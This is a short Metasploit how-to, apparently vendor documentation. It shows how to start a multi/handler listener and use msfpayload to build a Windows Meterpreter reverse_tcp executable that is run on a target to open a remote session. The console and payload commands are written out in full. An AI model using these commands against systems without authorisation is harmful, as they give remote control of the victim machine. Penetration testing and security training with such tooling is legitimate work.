Use Meterpreter Locally Without an Exploit

Metasploit Pro

Create a new project, click on Campaigns, create a new Campaign, enable the USB Campaign and configure the listener port. At this point, save the campaign, start it, then download the executable from the provided link. The session will now appear in the Sessions tab.

Alternatively, access Global Settings from the Administration menu and configure a new Persistent Listener through this interface, choosing the type of payload you want this listener to support (reverse_tcp, reverse_https, etc). Once the listener is setup, see the steps below for the Metasploit Framework to create the executable.

The steps listed below for Metasploit Community and Metasploit Framework can also be used without leveraging the Campaign feature in Metasploit Pro.

Metasploit Framework

Open a Metasploit Console by first launchign the console from the Start Menu on Windows or using the “msfpro” or “msfconsole” links on Linux. Once the console is open, enter the following commands:

msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.100 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j

This will run a handler listener in the background. Change 192.168.0.100 to whatever your machine’s IP is, but do not set this to 127.0.0.1 (this is special cased in Metasploit). Once the listener is running, its time to generate the actual payload.

Open a command shell with access to the Metasploit environment. On Windows, this is a link to the System Console, on Linux this is /opt/metasploit-4.1.2/diagnostic_shell. Linux users may not need to do this at all if msfconsole is already within their path.

From the shell, execute the following command:

Windows C:\metasploit > ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe

Linux $ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe

Copy this EXE to your intended target and execute it. The session will be visible with the Metasploit Console (or in the Sessions tab if you used one of the commercial or community products to create the listener)